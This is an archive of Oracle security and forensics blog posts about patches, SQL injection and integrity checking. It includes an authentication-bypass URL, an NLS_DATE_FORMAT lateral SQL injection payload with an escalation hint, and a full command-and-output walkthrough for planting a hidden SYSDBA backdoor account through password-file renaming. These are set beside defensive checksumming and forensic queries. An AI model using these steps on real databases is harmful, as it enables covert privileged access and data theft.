Application Server Vulnerability

Paul Wright May 11th, 2008 ~ 18:50 pm

http://www.securityfocus.com/archive/1/491865

In short, if an unauthenticated user makes this request:
"http://site/pls/portal/%0A"
then they will be able to access this URL
"http://site/dav_portal/portal/"
as though they were authenticated.

Interesting bug, I thought.

Also, I came across the web site below the other day, which has some interesting material on Oracle security, such as the 10g password hashing algorithm implemented in Python: http://www.thesprawl.org/infocalypse/index.php?title=Oracle_Authentication#Oracle_7-11_Password_Hashing_Algorithm

For your reference, the Oracle 11g hashing algorithm implemented in Python:
http://blog.red-database-security.com/2007/09/21/oracle-password-algorithm-11g-poc-code/

11g vulnerabilities ~ more detail

Paul Wright May 5th, 2008 ~ 9:39 am

More details on the April 2008 CPU vulnerabilities:
http://www.securityfocus.com/archive/1/491521
http://www.securityfocus.com/archive/1/491522
http://www.securityfocus.com/archive/1/491524
Exploit code may be in the pipeline, so check milw0rm etc. Note that the last two affect 11g as well. The CPU installation has been smoother and more reliable in my experience, so you should seriously think about installing this, especially if your DB has to restrict privileges between DB users, i.e. low-privileged users connect to Oracle directly.
It is also worth auditing your custom PL/SQL packages using plsqlscanner or a similar tool http://www.red-database-security.com/software/plsqlscanner.html
Details about the DB04 vulnerability which I found are available at my publisher's URL: http://www.dba-oracle.com/forensics/t_forensics_vulnerable.htm

Lateral SQL Injection

Paul Wright April 25th, 2008 ~ 1:03 am

David has released his latest paper, which investigates how, by changing NLS variables, an attacker can inject SQL into functions that do not normally take VARCHAR input, e.g. those that accept dates. Functions that take no input at all but rely on NLS variables are similarly affected. Lateral thinking.
Here is the paper http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf and congrats to NGS on winning the SC Security Company of the Year http://www.scmagazine.com/uk/awards/ and even more congrats to Betfair for winning the Queen's Award again. http://www.realbusiness.co.uk/news/international-business/5240271/queens-awards-the-big-winners.thtml
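An added worked example of the pattern the paper describes. This is not code from the paper or from the original post: the APP_OWNER and LOWPRIV schemas, the LIST_TODAYS_OBJECTS procedure and the payload are invented for the demonstration. It shows a definer-rights procedure with no parameters that is nevertheless injectable through the caller's NLS_DATE_FORMAT, and a bound version that closes the hole.

```sql
-- Added example (illustrative, not from the paper or this post). APP_OWNER, LOWPRIV,
-- LIST_TODAYS_OBJECTS and the payload are assumptions made up for the demo.

-- 1. Definer-rights procedure owned by a privileged schema. It takes no parameters, so it
--    looks immune to SQL injection, but SYSDATE is concatenated into dynamic SQL and the
--    implicit DATE -> VARCHAR2 conversion obeys the *caller's* NLS_DATE_FORMAT.
CREATE OR REPLACE PROCEDURE app_owner.list_todays_objects AUTHID DEFINER AS
  TYPE rc_t IS REF CURSOR;
  cv     rc_t;
  v_name VARCHAR2(128);
  v_sql  VARCHAR2(4000);
BEGIN
  v_sql := 'SELECT object_name FROM user_objects WHERE TRUNC(created) = '''
           || TRUNC(SYSDATE) || '''';          -- vulnerable concatenation
  DBMS_OUTPUT.PUT_LINE('Running: ' || v_sql);
  OPEN cv FOR v_sql;
  LOOP
    FETCH cv INTO v_name;
    EXIT WHEN cv%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(v_name);
  END LOOP;
  CLOSE cv;
END;
/
GRANT EXECUTE ON app_owner.list_todays_objects TO lowpriv;

-- 2. As LOWPRIV (CREATE SESSION plus the EXECUTE grant above, nothing else).
--    Text inside double quotes in a datetime format mask is emitted literally, and any
--    session may set its own mask. A datetime format model is limited to 22 characters,
--    so the payload has to be short. After SQL quoting this literal is the 12-character
--    mask  "' or 1=1--"  and every DATE the procedure renders becomes  ' or 1=1--
ALTER SESSION SET NLS_DATE_FORMAT = '"'' or 1=1--"';
SET SERVEROUTPUT ON
EXEC app_owner.list_todays_objects;
-- Running: SELECT object_name FROM user_objects WHERE TRUNC(created) = '' or 1=1--'
-- ...every object APP_OWNER owns is listed; the date filter is gone.
-- Replacing  or 1=1  with a call to a function LOWPRIV owns (e.g. "' or lowpriv.f()=1--")
-- runs that function with APP_OWNER's privileges, which is the escalation the paper covers.

-- 3. Hardened version: never let the DATE pass through an NLS-controlled conversion.
--    Bind it (preferred), or if it must be text use TO_CHAR with an explicit format mask.
CREATE OR REPLACE PROCEDURE app_owner.list_todays_objects AUTHID DEFINER AS
  TYPE rc_t IS REF CURSOR;
  cv     rc_t;
  v_name VARCHAR2(128);
BEGIN
  OPEN cv FOR 'SELECT object_name FROM user_objects WHERE TRUNC(created) = :d'
    USING TRUNC(SYSDATE);                       -- bound DATE: no string conversion at all
  LOOP
    FETCH cv INTO v_name;
    EXIT WHEN cv%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(v_name);
  END LOOP;
  CLOSE cv;
END;
/
-- General lesson: any implicit conversion governed by session NLS settings is under the
-- caller's control, so it is attacker input even when the procedure has no parameters.
```

The same ALTER SESSION works against any definer-rights code that concatenates a DATE, which is why auditing for dynamic SQL should look for concatenated non-VARCHAR values as well as the obvious string parameters.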

Java Oracle Security

Paul Wright April 22nd, 2008 ~ 19:30 pm

Oracle middle-tier applications usually use Java, which is why I have been working on Java security both at work and for SANS, in terms of training at http://www.sans.org/london07/description.php?tid=1517 and presenting at http://www.sans.org/sans2008/night.php.
Here are the PowerPoint notes in PDF from my latest presentation, javasecurity.pdf, given April 22nd at SANS Orlando.

April 2008 CPU

Paul Wright April 15th, 2008 ~ 22:08 pm

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html

The April 2008 CPU came out at 9.00pm UK time tonight as normal. Two of the vulnerabilities are ones that I found whilst working at NGS and both are PL/SQL injections, but the most critical bug is the JInitiator JVM bug... Java vulnerabilities are the subject of a presentation I am giving next week at SANS Orlando http://www.sans.org/sans2008/night.php. More to come on this subject.

Cheers,
Paul

Checksumming Presentation

Paul Wright March 22nd, 2008 ~ 10:37 am

Hello Folks,
I have just been asked for a copy of the UKOUG presentation I gave in December at Birmingham, as the person asking could not find it on UKOUG's site, so here it is. The UKOUG site is being updated, which may explain the current difficulty finding recent papers, as the last two years' conferences were not on there when I looked. In January I moved work place to the centre of London at Betfair.com. Here is some information about Betfair and Oracle http://www.oracle.com/customers/snapshots/betfair-database-case-study.pdf.
Also, this is the Head of our Security Department at Betfair, Adrian Asher.

As an aside, for Imperva users out there, I noticed that there is an alert on Bugtraq for Imperva SecureSphere
http://www.securityfocus.com/bid/28279/info. The solution is to upgrade to version 6.0. This is an important upgrade, as it fixes a number of problems with version 5.0.

General release of the Oracle Forensics book is in May.
http://www.amazon.com/Oracle-Forensics-Security-Practices-Focus/dp/0977671526
If you want a reviewer’s copy just send me an email to paul@oracleforensics.com

David's book will also be out this year, so it is promising to be an eventful year.
http://www.amazon.com/Oracle-Forensics-Using-Quisix-Litchfield/dp/047019118X

From a general IT Security point of view I think the role of IT Security in the political process is an interesting one and from a strategic level this presentation may provide some relief from Infosec.
http://www.oracle.com/global/uk/citizen-security/speakers.html

My next presentation is at SANS Orlando, with Stephen Northcutt, on Java Security so I had better get back to writing it..

Take care, have a great Easter and don’t forget to set the clocks forward on the 30th.
Paul

AlexK Best of 2007 in English

Research from Arizona University

Oracle Forensics Book ~ Now Available

Paul Wright December 26th, 2007 ~ 16:35 pm

About time too! Copies available through Rampant Techpress. Author’s copies in the UK can be made available to reviewers by contacting reviewcopy@oracleforensics.com.
Cheers and Merry Christmas

SYSDBA Backdoor without direct OS access

Paul Wright December 24th, 2007 ~ 23:35 pm

The first half of the SYSDBA Backdoor paper can be carried out without OS access
------------------------------------------------------------------------
The attacker brute forces a SYSDBA user and wishes to create a SYSDBA user that is hidden from SYS.USER$.
1. CREATE USER
2. GRANT SYSDBA TO USER
3. Rename the password file via UTL_FILE.FRENAME (requires CREATE DIRECTORY and EXECUTE on UTL_FILE).
4. DROP USER via the DB so the entry is lost from SYS.USER$ (the password file is untouched because it is no longer where Oracle expects it)
5. Rename the password file back

In detail on 11g Unbreakable Linux:
------------------------------------
First, how to get the location and filename of the OS-based password file.
By default it is in the same directory as the SPFILE, whose location can be found as follows.

//get the location
SQL> SELECT value FROM v$parameter WHERE NAME='spfile';
VALUE
--------------------------------------------------------------------------------
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/spfileorcl.ora

//get the name of the password file
By default the filename is
PWD<sid>.ora on Windows or
orapw<sid> on UNIX,
so the SID is needed. The global name normally matches it (if it does not, v$instance.instance_name gives the SID directly).

SQL> select global_name from global_name;
GLOBAL_NAME
--------------------------------------------------------------------------------
ORCL

Therefore the attacker can work out the information below:
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/orapworcl

So here we go in SQL*PLUS for demo purposes.

//create the backdoor SYSDBA user.

SQL> create user attacker identified by attacker
2 default tablespace users
3 temporary tablespace temp;
User created.

SQL> GRANT SYSDBA TO attacker;
Grant succeeded.

//remote machine
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:07:08 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> show user
USER is "SYS" //backdoor attacker account is working
SQL>

//the account is listed in sys.user$
SQL> SELECT NAME FROM SYS.USER$ ORDER BY NAME;
NAME
——————————
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
ATTACKER
AUTHENTICATEDUSER
BI

//attacker gets rid of the sys.user$ entry by first creating a directory to access the password file.
SQL> create directory password_file as '/home/oracle/app/oracle/product/11.1.0/db_1/dbs';
Directory created.

//attacker renames the password file so that the subsequent drop user does not affect the password file
SQL> BEGIN
  2  UTL_FILE.FRENAME('PASSWORD_FILE', 'orapworcl', 'PASSWORD_FILE', 'orapworclBU', TRUE);
  3  END;
  4  /

//then drops the user
SQL> drop user attacker;
User dropped.

//try to logon as sysdba now fails
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:13:39 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
ERROR:
ORA-01031: insufficient privileges
Enter user-name:

//copy back the password file by renaming it to the original name with the overwrite option set to TRUE.
SQL> BEGIN
  2  UTL_FILE.FRENAME('PASSWORD_FILE', 'orapworclBU', 'PASSWORD_FILE', 'orapworcl', TRUE);
3 END;
4 /

PL/SQL procedure successfully completed.

//attacker no longer in sys.user$ or dba_users but can logon remotely as SYSDBA.
SQL> select name from sys.user$ order by name;
NAME
——————————
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
BI
BILL

To secure against this, first make sure that no one can brute force a SYSDBA login (see the previous OraBrute paper).
Then regularly check the x$ tables and state-check the password file as well as the Oracle binary.
In addition it is generally good security to remove the means of reaching the OS from the DB, both via UTL_FILE and Java, and to restrict the CREATE DIRECTORY privilege.
In terms of forensic investigation, the last-modified timestamp on the file does not change when it is renamed but the last-accessed does (NTFS), but that is for another posting... more to come... and Merry Christmas!
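An added example, not from the original post or the paper, of state-checking the password file from inside the database: hash the file and keep a history, so that a rename-drop-rename leaves a trace even though SYS.USER$ and V$PWFILE_USERS do not show the account. Run it as SYS. The PWFILE_DIR directory object, the PWFILE_BASELINE table and the RECORD_PWFILE_STATE procedure are names assumed for this demonstration; the path is the 11g default shown above.

```sql
-- Added example: not from the original post. PWFILE_DIR, PWFILE_BASELINE and
-- RECORD_PWFILE_STATE are invented names; the path is the 11g default shown above.
-- Run as SYS and grant READ on the directory to nobody else: the file holds SYSDBA hashes.
CREATE OR REPLACE DIRECTORY pwfile_dir AS '/home/oracle/app/oracle/product/11.1.0/db_1/dbs';

CREATE TABLE pwfile_baseline (
  checked_at DATE,
  file_name  VARCHAR2(255),
  byte_len   NUMBER,
  md5_hash   RAW(16),
  sha1_hash  RAW(20)
);

-- Load the password file through a BFILE into a temporary BLOB and hash it with both
-- MD5 and SHA-1 (DBMS_CRYPTO.HASH has no BFILE overload, hence the copy).
CREATE OR REPLACE PROCEDURE record_pwfile_state(p_dir IN VARCHAR2, p_file IN VARCHAR2) AS
  bf  BFILE := BFILENAME(p_dir, p_file);
  bl  BLOB;
  len INTEGER;
BEGIN
  DBMS_LOB.FILEOPEN(bf, DBMS_LOB.FILE_READONLY);
  len := DBMS_LOB.GETLENGTH(bf);
  DBMS_LOB.CREATETEMPORARY(bl, TRUE);
  DBMS_LOB.LOADFROMFILE(bl, bf, len);
  DBMS_LOB.FILECLOSE(bf);
  INSERT INTO pwfile_baseline VALUES (
    SYSDATE, p_file, len,
    DBMS_CRYPTO.HASH(bl, DBMS_CRYPTO.HASH_MD5),
    DBMS_CRYPTO.HASH(bl, DBMS_CRYPTO.HASH_SH1));
  DBMS_LOB.FREETEMPORARY(bl);
  COMMIT;
END;
/

-- Take the baseline now, then schedule the same call and export the table off the box:
-- a SYSDBA who can rename orapw can also UPDATE this table to cover the change.
EXEC record_pwfile_state('PWFILE_DIR', 'orapworcl');

-- Every row returned is a change to the password file between two consecutive checks.
-- A legitimate GRANT/REVOKE SYSDBA or SYS password change explains a row; the
-- rename-drop-rename sequence above does not, and it is invisible in SYS.USER$.
SELECT checked_at, byte_len,
       RAWTOHEX(sha1_hash) AS sha1, RAWTOHEX(prev_sha1) AS previous_sha1
FROM  (SELECT checked_at, byte_len, sha1_hash,
              LAG(sha1_hash) OVER (PARTITION BY file_name ORDER BY checked_at) AS prev_sha1
       FROM   pwfile_baseline)
WHERE  prev_sha1 IS NOT NULL
AND    sha1_hash <> prev_sha1
ORDER  BY checked_at;

-- Cheap companion check: password-file users with no dictionary entry. It catches cruder
-- tampering, but not this backdoor, because the paper notes V$PWFILE_USERS does not show
-- the account either; that is why the file itself is hashed above.
SELECT username FROM v$pwfile_users
MINUS
SELECT username FROM dba_users;
```

The directory object this creates is exactly the kind of OS access the previous paragraph says to restrict, so it should be owned by SYS, read-only, and never granted out; the check is for the DBA's own scheduled state-check, not for application schemas.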

SYSDBA Backdoor

Paul Wright October 14th, 2007 ~ 21:27 pm

New Oracle Security/Forensics paper. http://www.oracleforensics.com/oraclesysdbabackdoor.pdf
This paper is a follow-up to the Oracle Passwords and OraBrute paper, which described the issue of SYSDBA brute forcing in 10g. Having brute forced a SYSDBA account, an attacker will wish to maintain SYSDBA access covertly, so that a DBA or security auditor is not aware that the access has been kept over time. Within Oracle databases such as 11g it is a quick and easy task to create a SYSDBA account that is hidden from SYS.USER$, DBA_USERS, V$PWFILE_USERS and GV$PWFILE_USERS, so that a user with DBA privileges cannot tell that the hacker's SYSDBA account is present in the DB. This paper examines such a SYSDBA "backdoor" and proposes defences and an appropriate forensic response, with more detail in the new Oracle Forensics book.

http://www.rampant-books.com/book_2007_1_oracle_forensics.htm
This issue affects all supported versions of Oracle’s RDBMS.

Finding Evidence of Data Theft in the Absence of Auditing

Paul Wright August 10th, 2007 ~ 20:06 pm

David Litchfield’s latest paper on Oracle Forensics is available at this URL.
http://www.databasesecurity.com/dbsec/OracleForensicsPt5.pdf

Forensic checksumming on all versions of supported Oracle databases

Paul Wright July 25th, 2007 ~ 1:31 am

Below is an excerpt from my new book on Oracle Forensics, which is available through Rampant Techpress and contains both the underlying concepts and the advanced practice of Oracle forensics, for both incident handling and vulnerability detection. A cornerstone of the book is the need to fully understand the methods an attacker may use against an Oracle server, so that the security practitioner can effectively secure the DB and respond effectively to an incident. Excerpt:
Checksums have been used in forensics to verify the state of a piece of code for many years, both in Tripwire-style OS tools and in lists of known-good checksums such as those produced by NIST http://www.nsrl.nist.gov/ .
Creating checksums in an Oracle database to verify integrity is pretty straightforward.
DBMS_UTILITY.GET_HASH_VALUE is available on 7, 8, 9 and 10 and is fast, but the implementation on 7 differs, so it returns a different checksum there. This is not good for forensic consistency.
DBMS_OBFUSCATION_TOOLKIT.MD5 is good on 9 and 10 (not 8) and cryptographically stronger than DBMS_UTILITY, but slower due to the more complex computation.
DBMS_CRYPTO.HASH with HASH_SH1 is on 10 only and is not fast, but it is the most secure of the three. MD5 on its own is susceptible to malicious use of a collision, where two files with differing content have the same checksum: http://www.doxpara.com/md5_someday.pdf. By using stripwire http://www.doxpara.com/stripwire-1.1.tar.gz an attacker can control the content of a malicious collision.

Using both MD5 and SHA1 together, however, makes a simultaneous collision in both all but impossible.

In summary, DBMS_UTILITY is useful for checking patches and day-to-day state checking where speed is important, but for higher security MD5 or preferably SHA1 should be used. For very high security purposes it is preferable to check integrity using a combination of both MD5 and SHA1.

Here is an example to check the state of the VIEWs in a given schema using the SHA1 algorithm (baseline first, then compare a later run against it):

set wrap off
set linesize 400
set serveroutput on
-- One table holds every run; RUN_TAG tells the baseline apart from a later check.
DROP TABLE SHA1VIEWSTATES;
CREATE TABLE SHA1VIEWSTATES(
  RUN_TAG      VARCHAR2(30),
  SHA1SCHEMA   VARCHAR2(30),
  SHA1NAME     VARCHAR2(30),
  SHA1CHECKSUM RAW(20));

-- Hash the DDL of every VIEW owned by lvschema with SHA-1 and record it under lvtag.
CREATE OR REPLACE PROCEDURE SHA1DBVIEWSTATECHECKER(lvschema IN VARCHAR2, lvtag IN VARCHAR2) AS
  TYPE C_TYPE IS REF CURSOR;
  CV     C_TYPE;
  l_hash RAW(20);
  lvname VARCHAR2(30);
  lvtype VARCHAR2(30) := 'VIEW';
BEGIN
  DBMS_OUTPUT.ENABLE(200000);
  OPEN CV FOR 'SELECT DISTINCT OBJECT_NAME FROM SYS.DBA_OBJECTS WHERE OBJECT_TYPE=''VIEW'' AND OWNER = :x' USING lvschema;
  LOOP
    FETCH CV INTO lvname;
    EXIT WHEN CV%NOTFOUND;   -- test straight after the fetch, or the last view is hashed twice
    -- DBMS_METADATA.GET_DDL returns a CLOB; DBMS_CRYPTO.HASH has a CLOB overload
    l_hash := DBMS_CRYPTO.HASH(DBMS_METADATA.GET_DDL(lvtype, lvname, lvschema), DBMS_CRYPTO.HASH_SH1);
    DBMS_OUTPUT.PUT_LINE('HashSHA1=' || RAWTOHEX(l_hash) || ' Name=' || lvschema || '.' || lvname);
    INSERT INTO SHA1VIEWSTATES VALUES (lvtag, lvschema, lvname, l_hash);
  END LOOP;
  CLOSE CV;
  COMMIT;
END;
/
-- Take the baseline now (and keep a copy of it outside the database, since anyone who can
-- alter a view can also alter this table).
EXEC SHA1DBVIEWSTATECHECKER('SYS', 'BASELINE');
SELECT * FROM SHA1VIEWSTATES WHERE RUN_TAG = 'BASELINE';

-- Carry out again in the future under a new tag and compare to the baseline to see if there has been change.
-- If both result sets are identical there should be no result from this query; a changed view
-- appears twice (old and new hash), a dropped or added view once.
EXEC SHA1DBVIEWSTATECHECKER('SYS', 'CHECK1');
(SELECT SHA1SCHEMA, SHA1NAME, SHA1CHECKSUM FROM SHA1VIEWSTATES WHERE RUN_TAG = 'BASELINE'
 MINUS
 SELECT SHA1SCHEMA, SHA1NAME, SHA1CHECKSUM FROM SHA1VIEWSTATES WHERE RUN_TAG = 'CHECK1')
UNION
(SELECT SHA1SCHEMA, SHA1NAME, SHA1CHECKSUM FROM SHA1VIEWSTATES WHERE RUN_TAG = 'CHECK1'
 MINUS
 SELECT SHA1SCHEMA, SHA1NAME, SHA1CHECKSUM FROM SHA1VIEWSTATES WHERE RUN_TAG = 'BASELINE');

I am going to SANSFIRE now in Washington DC, where I will be leading a BoF on Oracle Forensics to launch my new book, auditing the GCIA for ANSI and testing the new GSEs for SANS/GIAC, as well as catching up with some old friends.
Cheers,
Paul
Additional relevant links:
http://eprint.iacr.org/2006/104.pdf
http://web.mit.edu/AFS/sipb/project/fastcoll/
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

Catchup

Paul Wright May 20th, 2007 ~ 20:10 pm

Not been blogging for a while due to being busy at work. In the meantime there has been the following.
1. Oracle Audit Vault released by Oracle, but don't forget to read the trial licence... and that goes for many "free" Oracle products interestingly (30 days IOW).
2. Oracle Forensics Live Response paper by David. It starts with code that could give the DBA a nasty surprise on reboot, and extends the idea of creating a checksum profile that can be stored and compared at a later time. Checksums for Java byte code can be made using code in the paper. Additionally David refers to a commercial unwrapper for PL/SQL. Unwrappers have been around for a while; in order to be forensically sure of a piece of code's effect the source code needs to be read, so an unwrapper has many positive uses.
3. http://www.ukoug.co.uk/calendar/show_event.jsp?id=2861
is an interesting SIG meeting with a security flavour, though the contents of Pete's presentation are already online. Professor Carl Dudley's presentation on TDE is also worth making a journey for.
4. David is giving a very interesting talk at AusCERT. Wish I was there, and not just for the sun... as this presentation looks like the current "what's hot". http://conference.auscert.org.au/conf2007/presentation.php#presentation_TP_04

On a personal side note, if anyone watched the BEEB documentary on Hendrix, a small correction needs to be added. Hendrix's output did not go downhill after Woodstock, as the Band of Gypsys album, which is his most critically acclaimed album for many aficionados, was on New Year's AFTER Woodstock.
http://www.amazon.com/Band-Gypsys-Jimi-Hendrix/dp/B000002UVX
Also his influences were largely US soul, not the Brit pop of the time as the documentary suggests.
http://www.earlyhendrix.com/disco/confir.htm
For a much better Hendrix documentary I recommend "Jimi Hendrix" http://www.imdb.com/title/tt0070242/

April 2007 CPU

Paul Wright April 19th, 2007 ~ 22:06 pm

The April 2007 CPU is out at this URL. It is worth taking a DBState before the patch and one after, to see what has changed, as per my GSOC paper.
NGS are the only company with two researchers mentioned, and David was first to publish an in-depth analysis of the CPU at this URL:
http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf
David's analysis may have been first because he found most of the vulnerabilities, including the most critically rated... and there are plenty more to come.

Oracle Forensics by David Litchfield

Paul Wright April 4th, 2007 ~ 13:48 pm

David Litchfield has released three in-depth papers which will aid a forensic examiner tasked with analysing an Oracle database.
The first paper uncovers the logic behind the structure of the redo logs and the second analyses the structure of the data files whilst the third illustrates how to detect Authentication attacks. This is recommended reading and a significant contribution to the field of Oracle Forensics.

Using Oracle 10g database as a forensics tool

Paul Wright March 29th, 2007 ~ 20:42 pm

As well as carrying out a forensic analysis of an Oracle database, I am also interested in using an RDBMS as a tool in a forensic investigation. This link is relevant to that subject.
http://computer.forensikblog.de/en/2006/05/ftk_2_0_will_be_based_on_oracle_database.html

http://www.accessdata.com/media/en_US/press/Press.Oracle_Partnership.en_us.pdf
The PDF above describes using Oracle 10g to handle and sort the data/evidence of many investigations conducted by many analysts, with the ability to give the required VIEW privileges to each individual.
Of course this data will also need to be stored securely, which will require some work. The point is that, given large amounts of evidence, the search tools built into Oracle will facilitate more efficient pattern identification and forensic analysis.

Oracle Forensics In A Nutshell

Paul Wright March 25th, 2007 ~ 19:23 pm

I have written a short paper to give an overview of the essential basics of Oracle Forensics, which will be useful as an introductory crib sheet where time is in short supply. Feel free to let me know how best to update the paper. OracleForensicsInANutshell.pdf
This is a taster for the full version available from Rampant Techpress in the near future.
http://www.rampant-books.com/book_2007_1_oracle_forensics.htm
Cheers,
Paul

Oracle SAP legal battle

Paul Wright March 23rd, 2007 ~ 19:23 pm

http://www.securityfocus.com/news/11453
The Metalink site is available to all licensed Oracle users, and one cannot help but make a copy of a web page when one downloads it, BUT offering this on again as third-party support is questionable imo... allegedly.
This case may be interesting from a forensics perspective because of the question of which geographic legal jurisdiction it comes under. Also, if the support pages were regarding RHEL4/Unbreakable Linux, then is this infringing Oracle or Red Hat? Symbolically this is an interesting battle where the media one-upmanship may become more important than the actual facts of the case. More on the technical side, so WTS.

Action to SCN and SCN to time mapping

Paul Wright March 22nd, 2007 ~ 20:57 pm

These two queries should be helpful, especially in the absence of a timestamp column:

SQL> select ora_rowscn, name from sys.user$;

ORA_ROWSCN NAME
———- ——————————
5072905 SYS
5072905 PUBLIC
5072905 CONNECT
5072905 RESOURCE
5072905 DBA
5072905 SYSTEM
5072905 SELECT_CATALOG_ROLE
5072905 EXECUTE_CATALOG_ROLE
5072905 DELETE_CATALOG_ROLE
5072905 EXP_FULL_DATABASE
5072905 IMP_FULL_DATABASE

SQL> SELECT To_Char(TIME_DP,'dd/mm/yyyy hh24:mi:ss'), SCN_BAS FROM SYS.SMON_SCN_TIME;
30/04/2006 10:07:00 9637921
30/04/2006 10:01:53 9637140
30/04/2006 09:56:46 9636359
30/04/2006 09:51:39 9635645
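An added example (not from the original post) that joins the two queries above: each row's ORA_ROWSCN is bracketed by the SMON_SCN_TIME samples either side of it, so a change can be placed in a time window even without a timestamp column. It uses only the two dictionary objects already shown; SCN_TO_TIMESTAMP in the second query is the built-in 10g function for the same lookup.

```sql
-- Added example, not from the original post. The full SCN in SMON_SCN_TIME is
-- SCN_WRP * 2^32 + SCN_BAS; samples are a few minutes apart and kept only for a limited
-- period, so a NULL bound means the SCN falls outside the retained mapping.
SELECT u.name,
       u.ora_rowscn,
       (SELECT MAX(t.time_dp)
          FROM sys.smon_scn_time t
         WHERE t.scn_wrp * POWER(2, 32) + t.scn_bas <= u.ora_rowscn) AS not_before,
       (SELECT MIN(t.time_dp)
          FROM sys.smon_scn_time t
         WHERE t.scn_wrp * POWER(2, 32) + t.scn_bas >  u.ora_rowscn) AS not_after
FROM   sys.user$ u
WHERE  u.type# = 1                      -- users only; roles are type# 0
ORDER  BY u.ora_rowscn DESC, u.name;

-- On 10g and later SCN_TO_TIMESTAMP does the lookup for you, but it raises ORA-08181 for an
-- SCN older than the retained mapping, so filter those rows out first (or use the query above).
SELECT u.name, u.ora_rowscn, SCN_TO_TIMESTAMP(u.ora_rowscn) AS approx_time
FROM   sys.user$ u
WHERE  u.type# = 1
AND    u.ora_rowscn >= (SELECT MIN(t.scn_wrp * POWER(2, 32) + t.scn_bas)
                          FROM sys.smon_scn_time t)
ORDER  BY u.ora_rowscn DESC;
```

One caveat when reading the result: unless a table was created WITH ROWDEPENDENCIES, ORA_ROWSCN is tracked per block, so every row in a block reports the SCN of the most recent change to that block. That is why all the SYS.USER$ rows above show 5072905. A recent SCN on an old account therefore means something in the same block changed, not necessarily that account; it narrows the window for the investigator but is not proof on its own.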
